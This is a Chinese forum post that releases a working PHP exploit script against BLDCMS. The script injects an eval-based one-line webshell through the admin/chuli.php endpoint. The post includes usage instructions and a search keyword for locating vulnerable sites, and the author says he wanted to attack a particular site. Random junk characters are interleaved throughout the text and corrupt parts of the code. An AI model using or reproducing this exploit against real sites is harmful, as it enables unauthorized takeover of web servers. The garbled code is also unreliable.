之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
+ W% F ^1 j$ C0 v/ A F3 r B) u; G$ H% d" k' I0 J
# h+ g8 E8 F1 A/ Q" L: \话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 % ~# j9 v+ S' ?% t
+ {4 j& M& ]: q# b* s1 w既然都有人发了 我就把我之前写好的EXP放出来吧
: Z$ O. K& L- T$ u. w
2 Q) J/ V+ W! M" ?7 l' W% Y" r6 S0 hview source print?01.php;">8 E4 Z" q. D8 R( r9 P7 A. a3 R8 a
02.<!--?php9 G$ a0 s6 j9 A
03.echo "-------------------------------------------------------------------
, ^, R/ z" p( j% ^5 }, B* p04. & M D2 }3 e$ H y' v2 n
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP+ P! N0 {' i" d5 u
06. ! r3 X0 J2 F) [ {* e0 x, T
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun! y& |' A( S s3 w0 U; i
08. . ~* J) D+ Y) z- E
09.QQ:981009941\r\n 2013.3.21\r\n
" `# u/ g- @8 N8 r- A$ E$ g10. % Y; D, S* b5 c# S
11. 6 x. S) ]1 ~1 F6 n; p
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码0 S( y0 f4 ]1 Q8 j
13. ( {. H, U# \: |8 C
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
. p8 Z6 j% w5 y) Q# [15. * u! Q, ]$ D( W( m) \
16.--------------------------------------------------------------------\r\n";* a( I) D! U$ \/ ]" f
17.$url=$argv[1];3 q ?& c+ U, w A" a/ c' |
18.$dir=$argv[2];
# m# o, ^& f% n' \19.$pass=$argv[3];4 I6 ]1 ?9 \6 C% |
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
. F9 ?: } m9 l: U; c1 I21.if (emptyempty($pass)||emptyempty($url))
Y# k2 X. M- N- `4 y9 S9 a) o0 {22.{exit("请输入参数");}: ~. i5 e6 R0 g) B: V' l% g; [
23.else
2 I& i. w4 w- ~" s9 S1 Y. u24.{
: B2 ]" F( |, \. _25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev& A) Y; p1 U; [) f' m, x
26.
- N5 k8 X8 x# t: S27.al;
* Z2 T: C5 c& k' T7 Z' E28.$length = strlen($fuckdata);+ a) \& w; ^' |3 X
29.function getshell($url,$pass)9 r' h+ v6 Z3 o0 b. J) L# J
30.{
5 I8 V' v* P# D0 |( U3 u/ a6 L31.global $url,$dir,$pass,$eval,$length,$fuckdata;
# b" m) M1 B' }5 l6 |32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
+ k2 o9 Q0 m9 |1 v6 \# l. x" n) S# d33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";0 h1 ?1 k& t3 S( Z' I2 @
34.$header .= "User-Agent: MSIE\r\n";2 I3 |9 @% B+ B5 [! }. }) N$ [# D
35.$header .= "Host:".$url."\r\n";
5 Q1 q5 q0 J9 i/ [36.$header .= "Content-Length: ".$length."\r\n";
2 w5 s; T1 y4 h. d M37.$header .= "Connection: Close\r\n";( ^* T) `) l+ f
38.$header .="\r\n";' G5 K2 i! q: s5 ^0 _! Y S
39.$header .= $fuckdata."\r\n\r\n";
- | P3 x7 A- @0 G @% ?40.$fp = fsockopen($url, 80,$errno,$errstr,15);- P" I% D# ~7 y2 A
41.if (!$fp)
7 q' m; ?) v( T42.{
$ g: p: d, |8 }& m) y43.exit ("利用失败:请检查指定目标是否能正常打开");8 u. t c2 E- ]3 A" @9 ?8 `2 a: a1 k
44.}7 L6 B0 ^- h$ M) P! ~+ \9 G
45.else{ if (!fputs($fp,$header))
- m D2 E& T' ?! u8 _0 Q3 o5 |46.{exit ("利用失败");}7 w( k. S. n9 g: z1 [2 ]
47.else( V! W" N w1 v4 C
48.{
1 z1 |8 M; ? k) N% J6 e4 s49.$receive = '';
5 s6 m9 o" U/ ~. P3 L/ U50.while (!feof($fp)) {
" F6 z: h! ~0 V5 Y& k51.$receive .= @fgets($fp, 1000);. r( U7 y$ C) x$ U0 t& S
52.}
U% G' L' C# t; A9 n/ B# T* V53.@fclose($fp);
% S% ~( _3 X8 r9 k. Y54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
7 c9 _5 j J6 t5 k: X2 f55.
0 f* `9 x2 T. B# G1 C" f56.GPC是否=off)";
1 M, b% L1 Z, i \& }( k# C/ i; q57.}}& l7 M0 G$ s, S
58.}# d- R L0 S* G$ ^: d4 K! w) H# U
59.}
8 ~- N, |# k1 _0 t: Z60.getshell($url,$pass);9 z$ E7 z2 K1 L. T
61.?-->3 Z* X3 I% y/ u) R( k8 U, V/ q
" B+ @8 N3 a3 V3 w5 X' q% V s" w t% H, E
3 e5 k% A" p. i2 X9 P6 h
by 数据流
3 q6 V7 W# R& ]2 f+ j" C |
发表于 2013-3-26 20:49:10
收藏
支持
反对